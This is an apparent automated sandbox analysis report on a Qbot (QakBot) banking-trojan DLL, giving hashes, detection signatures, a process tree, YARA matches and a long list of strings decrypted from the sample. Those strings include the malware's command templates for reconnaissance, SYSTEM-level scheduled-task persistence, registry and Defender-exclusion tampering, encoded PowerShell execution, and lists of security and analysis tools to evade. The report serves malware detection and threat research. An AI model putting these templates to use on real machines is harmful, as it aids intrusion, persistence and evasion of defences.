Windows Analysis Report
F072.dll

Overview

General Information

Sample Name:F072.dll
Analysis ID:878698
MD5:0f25933ea364d051e10480e68cbf4ae7
SHA1:bcc95a67d10b389e7c58159911ceac3ba92bef0b
SHA256:f2e4cbb34cd7431ceb5a186fddd3b38736e5e327afff8dff5d87fe4a6a64048f
Tags:dll, qbot

Detection

Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Antivirus / Scanner detection for submitted sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Potentially malicious time measurement code found
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4332 cmdline: loaddll32.exe "C:\Users\user\Desktop\F072.dll" MD5: 3B4636AE519868037940CA5C4272091B)
    • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5268 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5236 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5240 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5708 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4732 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4708 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4696 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5400 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5636 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
Name: QakBot, qbot / Qbot
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and as a loader that uses C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320"}
Source | Rule | Description | Author | Strings
00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
decrypted.memstr | JoeSecurity_Qbot | Yara detected Qbot | Joe Security

Source | Rule | Description | Author | Strings
17.2.rundll32.exe.4940000.1.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
17.2.rundll32.exe.4940000.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
17.2.rundll32.exe.2c51168.0.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
17.2.rundll32.exe.2c51168.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
17.2.rundll32.exe.2c51168.0.raw.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320"}
            Source: F072.dllAvira: detected
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: netstat -nao
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: runas
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ipconfig /all
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: net localgroup
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: nltest /domain_trusts /all_trusts
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Microsoft
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELF_TEST_1
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: p%08x
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Self test FAILED!!!
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Self test OK.
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: /t5
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: whoami /all
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: cmd
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: route print
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .lnk
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: arp -a
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %s "$%s = \"%s\"; & $%s"
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: net share
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: cmd.exe /c set
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Self check
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %u;%u;%u;
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ProfileImagePath
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: at.exe %u:%u "%s" /I
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ProgramData
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Self check ok!
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: powershell.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: qwinsta
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: net view
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Component_08
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Start screenshot
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: schtasks.exe /Delete /F /TN %u
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: appidapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: c:\ProgramData
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Component_07
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: powershell.exe -encodedCommand %S
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: %u
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: powershell.exe -encodedCommand
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: netstat -nao
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: runas
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ipconfig /all
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SystemRoot
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: cscript.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: image/jpeg
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: LocalLow
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: displayName
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: shlwapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CommandLine
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: kernel32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: 1234567890
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wbj.go
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_DiskDrive
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: System32
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Name
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: WRSA.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: c:\\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SpyNetReporting
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: FALSE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: aswhookx.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Packages
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: RepUx.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Winsta0
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: root\SecurityCenter2
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: MsMpEng.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: userenv.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: csc_ui.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: \\.\pipe\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: pstorec.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: NTUSER.DAT
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: from
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: netapi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: gdi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: setupapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: iphlpapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CrAmTray.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: user32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: \sf2.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Software\Microsoft
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %S.%06d
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: bcrypt.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wtsapi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: shell32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: TRUE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_Bios
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: */*
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ByteFence.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: type=0x%04X
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ROOT\CIMV2
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: https
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: fshoster32.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: kernelbase.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: regsvr32.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %s\system32\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_Process
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: rundll32.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: LOCALAPPDATA
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: cmd.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: APPDATA
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: select
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: mcshield.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: advapi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ws2_32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .cfg
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_Product
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: WQL
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wininet.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: LastBootUpTime
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: urlmon.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Create
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_PnPEntity
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Initializing database...
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: winsta0\default
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .dat
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: WBJ_IGNORE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: next
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wpcap.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: image/pjpeg
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: fmon.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: vbs
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: aswhooka.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SysWOW64
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: mpr.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: image/gif
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: crypt32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ntdll.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: open
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
